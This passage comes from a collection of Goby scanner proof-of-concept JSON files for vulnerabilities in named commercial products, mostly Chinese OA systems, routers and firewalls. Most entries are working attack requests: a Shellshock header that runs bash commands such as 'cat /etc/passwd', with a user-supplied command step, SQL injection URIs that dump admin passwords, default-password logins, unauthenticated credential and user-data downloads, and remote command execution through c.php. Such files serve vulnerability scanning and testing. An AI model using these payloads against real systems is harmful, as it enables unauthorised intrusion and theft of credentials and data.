", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "name": "Cmd", 21 | "type": "input", 22 | "value": "cat /etc/passwd", 23 | "show": "" 24 | } 25 | ], 26 | "ScanSteps": [ 27 | "AND", 28 | { 29 | "Request": { 30 | "method": "GET", 31 | "uri": "/cgi-bin/jarrewrite.sh", 32 | "follow_redirect": true, 33 | "header": { 34 | "User-Agent": "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'" 35 | }, 36 | "data_type": "text", 37 | "data": "" 38 | }, 39 | "ResponseTest": { 40 | "type": "group", 41 | "operation": "AND", 42 | "checks": [ 43 | { 44 | "type": "item", 45 | "variable": "$code", 46 | "operation": "==", 47 | "value": "200", 48 | "bz": "" 49 | }, 50 | { 51 | "type": "item", 52 | "variable": "$body", 53 | "operation": "contains", 54 | "value": "root", 55 | "bz": "" 56 | } 57 | ] 58 | }, 59 | "SetVariable": [] 60 | } 61 | ], 62 | "ExploitSteps": [ 63 | "AND", 64 | { 65 | "Request": { 66 | "method": "GET", 67 | "uri": "/cgi-bin/jarrewrite.sh", 68 | "follow_redirect": true, 69 | "header": { 70 | "User-Agent": "() { :; }; echo ; /bin/bash -c '{{{Cmd}}}'" 71 | }, 72 | "data_type": "text", 73 | "data": "" 74 | }, 75 | "SetVariable": [ 76 | "output|lastbody" 77 | ] 78 | } 79 | ], 80 | "PostTime": "2021-01-26 15:28:34", 81 | "GobyVersion": "1.8.237" 82 | } -------------------------------------------------------------------------------- /json/U8_OA.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "U8-OA", 3 | "Level": "3", 4 | "Tags": [ 5 | "SQL Injection" 6 | ], 7 | "GobyQuery": "body=\"U8-OA\"", 8 | "Description": "", 9 | "Product": "", 10 | "Homepage": "https://gobies.org/", 11 | "Author": "gobysec@gmail.com", 12 | "Impact": "", 13 | "Recommandation": "

undefined

", 14 | "References": [ 15 | "https://gobies.org/" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))", 23 | "follow_redirect": true, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "c4ca4238a0b923820dcc509a6f75849b", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [] 49 | } 50 | ], 51 | "PostTime": "2021-04-25 10:46:03", 52 | "GobyVersion": "1.8.239" 53 | } -------------------------------------------------------------------------------- /json/Wayos AC集中管理系统默认弱口令 CNVD-2021-00876.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Wayos AC集中管理系统默认弱口令 CNVD-2021-00876", 3 | "Level": "2", 4 | "Tags": [ 5 | "弱口令" 6 | ], 7 | "GobyQuery": "title=\"AC集中管理平台\" && body=\"login_25.jpg\"", 8 | "Description": "深圳维盟科技股份有限公司是国内领先的网络设备及智能家居产品解决方案供应商,主营产品包括无线网关、交换机、国外VPN、双频吸顶ap等。\n\nAC集中管理平台存在弱口令漏洞,攻击者可利用该漏洞获取敏感信息。\n弱口令 admin:admin", 9 | "Product": "深圳维盟科技股份有限公司AC集中管理平台", 10 | "Homepage": "http://www.wayos.com/", 11 | "Author": "PeiQi", 12 | "Impact": "

🐏

", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "POST", 22 | "uri": "/login.cgi", 23 | "follow_redirect": true, 24 | "header": { 25 | "Content-Type": "application/x-www-form-urlencoded" 26 | }, 27 | "data_type": "text", 28 | "data": "user=admin&password=admin" 29 | }, 30 | "ResponseTest": { 31 | "type": "group", 32 | "operation": "AND", 33 | "checks": [ 34 | { 35 | "type": "item", 36 | "variable": "$code", 37 | "operation": "==", 38 | "value": "200", 39 | "bz": "" 40 | }, 41 | { 42 | "type": "item", 43 | "variable": "$body", 44 | "operation": "not contains", 45 | "value": "flag=0", 46 | "bz": "" 47 | } 48 | ] 49 | }, 50 | "SetVariable": [] 51 | } 52 | ], 53 | "PostTime": "2021-02-07 23:13:20", 54 | "GobyVersion": "1.8.237" 55 | } -------------------------------------------------------------------------------- /json/Wayos_AC_Centralized_management_system_Default_weak_password.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Wayos AC Centralized management system Default weak password (CNVD-2021-00876)", 3 | "Level": "2", 4 | "Tags": [ 5 | "Default weak password" 6 | ], 7 | "GobyQuery": "title=\"AC集中管理平台\" && body=\"login_25.jpg\"", 8 | "Description": "Shenzhen Weimeng Technology Co., Ltd. is a leading network equipment and smart home product solution provider in China. Its main products include wireless gateway, switch, foreign VPN, dual band top-down AP, etc.\n\n\n\nWeak password vulnerability exists in AC centralized management platform, which can be used by attackers to obtain sensitive information.", 9 | "Product": "Wayos AC Centralized management system", 10 | "Homepage": "http://www.wayos.com/", 11 | "Author": "PeiQi", 12 | "Impact": "

An attacker can use this vulnerability to obtain sensitive information.

", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "POST", 22 | "uri": "/login.cgi", 23 | "follow_redirect": true, 24 | "header": { 25 | "Content-Type": "application/x-www-form-urlencoded" 26 | }, 27 | "data_type": "text", 28 | "data": "user=admin&password=admin" 29 | }, 30 | "ResponseTest": { 31 | "type": "group", 32 | "operation": "AND", 33 | "checks": [ 34 | { 35 | "type": "item", 36 | "variable": "$code", 37 | "operation": "==", 38 | "value": "200", 39 | "bz": "" 40 | }, 41 | { 42 | "type": "item", 43 | "variable": "$body", 44 | "operation": "not contains", 45 | "value": "flag=0", 46 | "bz": "" 47 | } 48 | ] 49 | }, 50 | "SetVariable": [] 51 | } 52 | ], 53 | "PostTime": "2021-04-04 22:08:56", 54 | "GobyVersion": "1.8.255" 55 | } -------------------------------------------------------------------------------- /json/Weaver_OA_8_SQL_injection.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Weaver OA 8 SQL injection", 3 | "Level": "2", 4 | "Tags": [ 5 | "SQL Injection" 6 | ], 7 | "GobyQuery": "app=\"Weaver-OA\"", 8 | "Description": "There is a SQL injection vulnerability in Pan micro OA V8, through which an attacker can obtain administrator and server privileges", 9 | "Product": "Weaver OA 8", 10 | "Homepage": "https://www.weaver.com.cn/", 11 | "Author": "PeiQi", 12 | "Impact": "", 13 | "Recommandation": "

undefined

", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager", 23 | "follow_redirect": false, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "not contains", 43 | "value": "404 Not Found", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "not contains", 50 | "value": "", 51 | "bz": "" 52 | }, 53 | { 54 | "type": "item", 55 | "variable": "$body", 56 | "operation": "contains", 57 | "value": "script", 58 | "bz": "" 59 | } 60 | ] 61 | }, 62 | "SetVariable": [] 63 | } 64 | ], 65 | "PostTime": "2021-04-10 08:00:20", 66 | "GobyVersion": "1.8.255" 67 | } -------------------------------------------------------------------------------- /json/XXL-JOB 任务调度中心 后台默认弱口令.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "XXL-JOB 任务调度中心 后台默认弱口令", 3 | "Level": "2", 4 | "Tags": [], 5 | "GobyQuery": "(app=\"XXL-JOB\" || title=\"任务调度中心\")", 6 | "Description": "", 7 | "Product": "", 8 | "Homepage": "https://gobies.org/", 9 | "Author": "gobysec@gmail.com", 10 | "Impact": "", 11 | "Recommandation": "", 12 | "References": [ 13 | "https://gobies.org/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "POST", 20 | "uri": "/login", 21 | "follow_redirect": true, 22 | "header": { 23 | "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8" 24 | }, 25 | "data_type": "text", 26 | "data": "userName=admin&password=123456" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "not contains", 50 | "value": "500", 51 | "bz": "" 52 | } 53 | ] 54 | }, 55 | "SetVariable": [] 56 | } 57 | ], 58 | "PostTime": "2021-03-17 12:24:54", 59 | "GobyVersion": "1.8.237" 60 | } -------------------------------------------------------------------------------- /json/XXL_JOB_Default_password.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "XXL-JOB Default password", 3 | "Level": "2", 4 | "Tags": [ 5 | "Default password" 6 | ], 7 | "GobyQuery": "(app=\"XXL-JOB\" || title=\"任务调度中心\")", 8 | "Description": "There is a default weak password in the background of xxl-job task scheduling center, so attackers can further attack in the background", 9 | "Product": "XXL-JOB", 10 | "Homepage": "https://www.xuxueli.com/xxl-job/", 11 | "Author": "PeiQi", 12 | "Impact": "

Attackers can further attack in the background

", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "POST", 22 | "uri": "/login", 23 | "follow_redirect": true, 24 | "header": { 25 | "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8" 26 | }, 27 | "data_type": "text", 28 | "data": "userName=admin&password=123456" 29 | }, 30 | "ResponseTest": { 31 | "type": "group", 32 | "operation": "AND", 33 | "checks": [ 34 | { 35 | "type": "item", 36 | "variable": "$code", 37 | "operation": "==", 38 | "value": "200", 39 | "bz": "" 40 | }, 41 | { 42 | "type": "item", 43 | "variable": "$body", 44 | "operation": "contains", 45 | "value": "200", 46 | "bz": "" 47 | }, 48 | { 49 | "type": "item", 50 | "variable": "$body", 51 | "operation": "not contains", 52 | "value": "500", 53 | "bz": "" 54 | } 55 | ] 56 | }, 57 | "SetVariable": [] 58 | } 59 | ], 60 | "PostTime": "2021-04-04 22:53:01", 61 | "GobyVersion": "1.8.255" 62 | } -------------------------------------------------------------------------------- /json/Xieda_oa.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Xieda-oa", 3 | "Level": "3", 4 | "Tags": [], 5 | "GobyQuery": "body=\"协达软件\"", 6 | "Description": "", 7 | "Product": "", 8 | "Homepage": "https://gobies.org/", 9 | "Author": "gobysec@gmail.com", 10 | "Impact": "", 11 | "Recommandation": "", 12 | "References": [ 13 | "https://gobies.org/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "GET", 20 | "uri": "/interface/DownFileAttach.jsp?filepath=/WEB-INF/classes/YxrConnectText.txt", 21 | "follow_redirect": true, 22 | "header": {}, 23 | "data_type": "text", 24 | "data": "" 25 | }, 26 | "ResponseTest": { 27 | "type": "group", 28 | "operation": "AND", 29 | "checks": [ 30 | { 31 | "type": "item", 32 | "variable": "$code", 33 | "operation": "==", 34 | "value": "200", 35 | "bz": "" 36 | }, 37 | { 38 | "type": "item", 39 | "variable": "$body", 40 | "operation": "contains", 41 | "value": "password", 42 | "bz": "" 43 | } 44 | ] 45 | }, 46 | "SetVariable": [] 47 | } 48 | ], 49 | "PostTime": "2021-04-25 12:54:52", 50 | "GobyVersion": "1.8.239" 51 | } -------------------------------------------------------------------------------- /json/YAPI_RCE.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "YAPI RCE", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "(app=\"YAPI\" | title==\"YApi-高效、易用、功能强大的可视化接口管理平台\" | title==\"YApi Pro-高效、易用、功能强大的可视化接口管理平台\")", 8 | "Description": "YAPI是由去哪儿网移动架构组(简称YMFE,一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具,是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI发布在公网且开发注册,会导致攻击者注册后执行任意命令。", 9 | "Product": "YAPI", 10 | "Homepage": "https://github.com/YMFE/yapi", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://mp.weixin.qq.com/s/zobag3-fIl_0vrc8BrnRjg" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "POST", 28 | "uri": "/api/user/reg", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "not contains", 50 | "value": "禁止注册,请联系管理员", 51 | "bz": "" 52 | }, 53 | { 54 | "type": "item", 55 | "variable": "$body", 56 | "operation": "contains", 57 | "value": "邮箱不能为空", 58 | "bz": "" 59 | } 60 | ] 61 | }, 62 | "SetVariable": [ 63 | "output|lastbody|regex|" 64 | ] 65 | } 66 | ], 67 | "PostTime": "2021-12-01 20:34:40", 68 | "GobyVersion": "1.9.310" 69 | } -------------------------------------------------------------------------------- /json/fahuo100_sql_injection_CNVD_2021_30193.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "fahuo100_sql_injection_CNVD_2021_30193", 3 | "Level": "3", 4 | "Tags": [ 5 | "SQL Injection" 6 | ], 7 | "GobyQuery": "header=\"Cache-Control: no-store, no-cache\"", 8 | "Description": "发货100 M_id参数存在SQL注入漏洞, 攻击者通过漏洞可以获取数据库敏感信息", 9 | "Product": "发货100", 10 | "Homepage": "https://www.fahuo100.cn/", 11 | "Author": "gobysec@gmail.com", 12 | "Impact": "", 13 | "Recommandation": "

undefined

", 14 | "References": [ 15 | "https://gobies.org/" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/?M_id=1'&type=product", 23 | "follow_redirect": true, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$body", 35 | "operation": "contains", 36 | "value": "mysql", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "Warning", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [] 49 | } 50 | ], 51 | "PostTime": "2021-06-03 22:27:28", 52 | "GobyVersion": "1.8.268" 53 | } -------------------------------------------------------------------------------- /json/firewall_Leaked_user_name_and_password.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "防火墙设备账号密码泄露漏洞", 3 | "Level": "3", 4 | "Tags": [ 5 | "Disclosure of Sensitive Information" 6 | ], 7 | "GobyQuery": "body=\"var dkey_verify = Get_Verify_Info(hex_md5\"", 8 | "Description": "中科网威、锐捷、网域多个设备的防火墙控制系统 存在账号密码泄露漏洞,攻击者通过前端获取密码的Md5后解密可获取完整密码登陆后台", 9 | "Product": "防火墙", 10 | "Homepage": "https://gobies.org/", 11 | "Author": "gobysec@gmail.com", 12 | "Impact": "", 13 | "Recommandation": "

undefined

", 14 | "References": [ 15 | "https://gobies.org/" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/", 23 | "follow_redirect": false, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$body", 35 | "operation": "contains", 36 | "value": "var dkey_verify = Get_Verify_Info(hex_md5", 37 | "bz": "" 38 | } 39 | ] 40 | }, 41 | "SetVariable": [] 42 | } 43 | ], 44 | "PostTime": "2021-06-01 11:09:54", 45 | "GobyVersion": "1.8.268" 46 | } -------------------------------------------------------------------------------- /json/mallgard.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "mallgard", 3 | "Level": "3", 4 | "Tags": [], 5 | "GobyQuery": "app=\"佑友-佑友防火墙\"", 6 | "Description": "", 7 | "Product": "", 8 | "Homepage": "https://gobies.org/", 9 | "Author": "gobysec@gmail.com", 10 | "Impact": "", 11 | "Recommandation": "", 12 | "References": [ 13 | "https://gobies.org/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "POST", 20 | "uri": "/index.php?c=user&a=ajax_save", 21 | "follow_redirect": true, 22 | "header": { 23 | "Content-type": "text/html; charset=utf-8" 24 | }, 25 | "data_type": "text", 26 | "data": "username=admin&password=hicomadmin&language=zh-cn" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "message", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [] 49 | } 50 | ], 51 | "PostTime": "2021-04-21 14:10:45", 52 | "GobyVersion": "1.8.239" 53 | } -------------------------------------------------------------------------------- /json/sangfor_Behavior_perception_system_c.php_RCE.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "深信服 行为感知系统 c.php 远程命令执行漏洞", 3 | "Level": "3", 4 | "Tags": [ 5 | "RCE" 6 | ], 7 | "GobyQuery": "body=\"isHighPerformance : !!SFIsHighPerformance,\"", 8 | "Description": "深信服 行为感知系统 c.php 远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行", 9 | "Product": "深信服 行为感知系统", 10 | "Homepage": "", 11 | "Author": "peiqi", 12 | "Impact": "", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech/Goby%20&%20POC.html?q=" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/tool/log/c.php?strip_slashes=system&host=ipconfig", 23 | "follow_redirect": true, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "OR", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "Windows IP", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "contains", 50 | "value": "IPv6", 51 | "bz": "" 52 | } 53 | ] 54 | }, 55 | "SetVariable": [] 56 | } 57 | ], 58 | "PostTime": "2021-06-04 10:11:18", 59 | "GobyVersion": "1.8.268" 60 | } -------------------------------------------------------------------------------- /json/shtermQiZhi_Fortress_Arbitrary_User_Login.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "shterm(QiZhi) Fortress Arbitrary User Login", 3 | "Level": "3", 4 | "Tags": [ 5 | "Any user login" 6 | ], 7 | "GobyQuery": "app=\"shterm-Fortres-Machine\"", 8 | "Description": "Qizhi fortress machine has any user login vulnerability, access to a specific URL can obtain background permissions", 9 | "Product": "shterm(QiZhi) Fortress ", 10 | "Homepage": "shterm.com", 11 | "Author": "PeiQi", 12 | "Impact": "

Get background permission

", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm", 23 | "follow_redirect": false, 24 | "header": { 25 | "Cookie": "PHPSESSID=4uh4l0e3b0fd28d27l71u5be36" 26 | }, 27 | "data_type": "text", 28 | "data": "" 29 | }, 30 | "ResponseTest": { 31 | "type": "group", 32 | "operation": "AND", 33 | "checks": [ 34 | { 35 | "type": "item", 36 | "variable": "$code", 37 | "operation": "==", 38 | "value": "200", 39 | "bz": "" 40 | }, 41 | { 42 | "type": "item", 43 | "variable": "$body", 44 | "operation": "contains", 45 | "value": "错误的id", 46 | "bz": "" 47 | } 48 | ] 49 | }, 50 | "SetVariable": [] 51 | } 52 | ], 53 | "PostTime": "2021-04-09 23:53:26", 54 | "GobyVersion": "1.8.255" 55 | } -------------------------------------------------------------------------------- /json/yycms_XSS.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "yycms-XSS", 3 | "Level": "0", 4 | "Tags": [], 5 | "GobyQuery": "body=\"templets/yycms/css/\"", 6 | "Description": "", 7 | "Product": "", 8 | "Homepage": "https://gobies.org/", 9 | "Author": "gobysec@gmail.com", 10 | "Impact": "", 11 | "Recommandation": "", 12 | "References": [ 13 | "https://gobies.org/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "GET", 20 | "uri": "/search-.html", 21 | "follow_redirect": true, 22 | "header": { 23 | "Content-Type": "text/html; charset=utf-8" 24 | }, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "font", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [] 49 | } 50 | ], 51 | "PostTime": "2021-04-19 11:01:23", 52 | "GobyVersion": "1.8.230" 53 | } -------------------------------------------------------------------------------- /json/来福云SQL注入漏洞.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "laifuyun_sqli", 3 | "Level": "2", 4 | "Tags": [], 5 | "GobyQuery": "title=\"孚盟云 - 用户登录\"", 6 | "Description": "上海孚盟软件有限公司成立于2006年06月05日,注册地位于上海市闵行区元江路5500号第1幢,法定代表人为郭彦荣。经营范围包括从事计算机技术领域内的技术开发、技术转让、技术咨询、技术服务,机电产品的批发(除专控)。[依法须经批准的项目,经相关部门批准后方可开展经营活动]上海孚盟软件有限公司对外投资1家公司,具有9处分支机构。", 7 | "Product": "孚盟云", 8 | "Homepage": "https://www.laifuyun.com/", 9 | "Author": "Nine River SEC", 10 | "Impact": "", 11 | "Recommandation": "

undefined

", 12 | "References": [ 13 | "Internet" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "GET", 20 | "uri": "///Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y", 21 | "follow_redirect": true, 22 | "header": {}, 23 | "data_type": "text", 24 | "data": "" 25 | }, 26 | "ResponseTest": { 27 | "type": "group", 28 | "operation": "AND", 29 | "checks": [ 30 | { 31 | "type": "item", 32 | "variable": "$code", 33 | "operation": "==", 34 | "value": "200", 35 | "bz": "" 36 | } 37 | ] 38 | }, 39 | "SetVariable": [] 40 | } 41 | ], 42 | "PostTime": "2021-03-31 17:37:40", 43 | "GobyVersion": "1.8.237" 44 | } -------------------------------------------------------------------------------- /json/致远OA A6 数据库敏感信息泄露.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "致远OA A6 数据库敏感信息泄露", 3 | "Level": "1", 4 | "Tags": [ 5 | "敏感信息泄露" 6 | ], 7 | "GobyQuery": "(app=\"致远互联-OA\" || app=\"Seeyon-Server\"|| app=\"用友-致远OA\" || (server=\"Seeyon-Server\") || (body=\"/seeyon/USER-DATA/IMAGES/LOGIN/login.gif\" || title=\"用友致远A\" || body=\"/yyoa/\" || header=\"path=/yyoa\" || server==\"SY8044\" || (body=\"A6-V5企业版\" && body=\"seeyon\" && body=\"seeyonProductId\") || (body=\"/seeyon/common/\" && body=\"var _ctxpath = '/seeyon'\") || (body=\"A8-V5企业版\" && body=\"/seeyon/\"))", 8 | "Description": "致远OA A6 存在数据库敏感信息泄露,攻击者可以通过访问特定的URL获取数据库账户以及密码 MD5", 9 | "Product": "致远OA A6", 10 | "Homepage": "PeiQi", 11 | "Author": "PeiQi", 12 | "Impact": "

🐏

", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/yyoa/createMysql.jsp", 23 | "follow_redirect": true, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "root", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [] 49 | } 50 | ], 51 | "PostTime": "2021-03-18 21:36:42", 52 | "GobyVersion": "1.8.237" 53 | } -------------------------------------------------------------------------------- /json/致远OA A6 用户敏感信息泄露.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "致远OA A6 用户敏感信息泄露", 3 | "Level": "2", 4 | "Tags": [ 5 | "信息泄露" 6 | ], 7 | "GobyQuery": "(app=\"致远互联-OA\" || app=\"Seeyon-Server\"|| app=\"用友-致远OA\" || (server=\"Seeyon-Server\") || (body=\"/seeyon/USER-DATA/IMAGES/LOGIN/login.gif\" || title=\"用友致远A\" || body=\"/yyoa/\" || header=\"path=/yyoa\" || server==\"SY8044\" || (body=\"A6-V5企业版\" && body=\"seeyon\" && body=\"seeyonProductId\") || (body=\"/seeyon/common/\" && body=\"var _ctxpath = '/seeyon'\") || (body=\"A8-V5企业版\" && body=\"/seeyon/\"))", 8 | "Description": "致远OA A6 存在某个未授权的接口导致任意访问者可下载OA中的用户信息\nhttp://xxx.xxx.xxx.xxx/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0", 9 | "Product": "致远OA A6", 10 | "Homepage": "PeiQi", 11 | "Author": "PeiQi", 12 | "Impact": "

🐏

", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0", 23 | "follow_redirect": true, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "@", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [] 49 | } 50 | ], 51 | "PostTime": "2021-03-18 22:35:46", 52 | "GobyVersion": "1.8.237" 53 | } -------------------------------------------------------------------------------- /json/蜂网互联 企业级路由器v4.31 密码泄露漏洞 CVE-2019-16313.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "蜂网互联 企业级路由器v4.31 密码泄露漏洞 CVE-2019-16313", 3 | "Level": "2", 4 | "Tags": [ 5 | "账号密码泄露" 6 | ], 7 | "GobyQuery": "(title=\"登录界面\" && app=\"ifw8-Router\")", 8 | "Description": "蜂网互联企业级路由器v4.31存在接口未授权访问,导致攻击者可以是通过此漏洞得到路由器账号密码接管路由器", 9 | "Product": "蜂网互联企业级路由器v4.31", 10 | "Homepage": "http://www.ifw8.cn/", 11 | "Author": "PeiQi", 12 | "Impact": "

🐏

", 13 | "Recommandation": "

undefined

